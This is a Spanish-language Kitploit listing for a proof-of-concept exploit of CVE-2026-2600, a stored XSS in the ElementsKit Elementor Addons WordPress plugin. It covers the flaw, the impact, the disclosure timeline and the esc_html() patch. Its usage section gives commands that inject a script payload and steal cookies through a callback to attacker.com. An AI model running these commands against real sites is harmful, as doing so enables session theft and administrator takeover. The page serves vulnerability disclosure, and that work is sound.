Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/folks-iwd/cve-2026-2600-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubfolks-iwd/cve-2026-2600-poc

CVE-2026-2600-POC

Prueba de concepto de exploit para CVE-2026-2600, un XSS almacenado en ElementsKit Elementor Addons <= 3.7.9, que permite a Contribuidores autenticados inyectar scripts arbitrarios mediante datos de Elementor manipulados.

Ver Repositorio
1hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-2600

ElementsKit Elementor Addons <= 3.7.9 — Cross-Site Scripting Almacenado Autenticado (Contributor+)

CVSS6.4 MEDIO
Afectado<= 3.7.9
Parcheado3.8.0
Rol mínimoContributor (edit_posts)
VectorRed / Complejidad baja / Privilegios bajos

El fallo

El widget Simple Tab renderiza los títulos de las pestañas con HTML mediante echo pero sin escape de salida. En widgets/tab/tab.php, el bucle de renderizado hace:

root@kitploit:~
foreach ( $settings['ekit_tab_items'] as $index => $item ) {
    echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
}

El editor de Elementor sanea la entrada en el lado del cliente, pero el endpoint de la API REST (/wp-json/wp/v2/posts/{id}) acepta el campo meta _elementor_data directamente y omite esa capa por completo.

Un Contributor autenticado puede hacer PATCH a una entrada con un payload JSON de Elementor manipulado que establece ekit_tab_title a HTML arbitrario. Debido a que el valor se almacena literalmente en _elementor_data y se muestra con echo sin esc_html() en el momento del renderizado, el script se ejecuta en el navegador de cada visitante cuando la página se carga.

Impacto

Cualquier Contributor puede:

  • Robar cookies de sesión y tokens de autenticación de todos los visitantes del sitio, incluidos los administradores
  • Secuestrar cuentas de administrador y escalar hasta la toma completa del sitio
  • Desplegar keyloggers o superposiciones de captura de credenciales de forma silenciosa
  • Redirigir a los visitantes a páginas de phishing o sitios de distribución de malware
  • Desfigurar páginas de forma persistente: el payload sobrevive hasta que se elimina manualmente

Más de 400K instalaciones activas estaban afectadas en el momento de la divulgación.

Uso

root@kitploit:~
pip install requests
python3 poc.py https://target.com contributor p4ss

El script se autentica a través de HTTP, obtiene el nonce REST del editor de administración, crea una entrada en borrador, aplica PATCH a _elementor_data con el payload XSS incrustado en el campo ekit_tab_title, y publica la entrada. La salida confirma si el payload está activo en el código fuente de la página.

root@kitploit:~
# Payload personalizado
python3 poc.py https://target.com contributor p4ss --payload '<script>alert(document.domain)</script>'

# Exfiltración de cookies con callback
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal

# Modo consola interactivo
python3 console_poc.py

Informe completo

https://folks-iwd.github.io/writeups/cve-2026-2600.html

Cronología de divulgación

FechaEvento
Enero 2026Descubierto mediante revisión de diff SVN. PoC confirmado.
Enero 2026Reportado a Patchstack Alliance con informe completo y PoC.
Marzo 2026Wpmet publicó la corrección en v3.8.0.
Abril 2026CVE-2026-2600 publicado. Se asignó CVSS 6.4 MEDIO.

El parche

Wpmet añadió esc_html() alrededor de la salida del título de la pestaña en widgets/tab/tab.php:

root@kitploit:~
- echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
+ echo '<a ...>' . esc_html( $item['ekit_tab_title'] ) . '</a>';
Descargar herramienta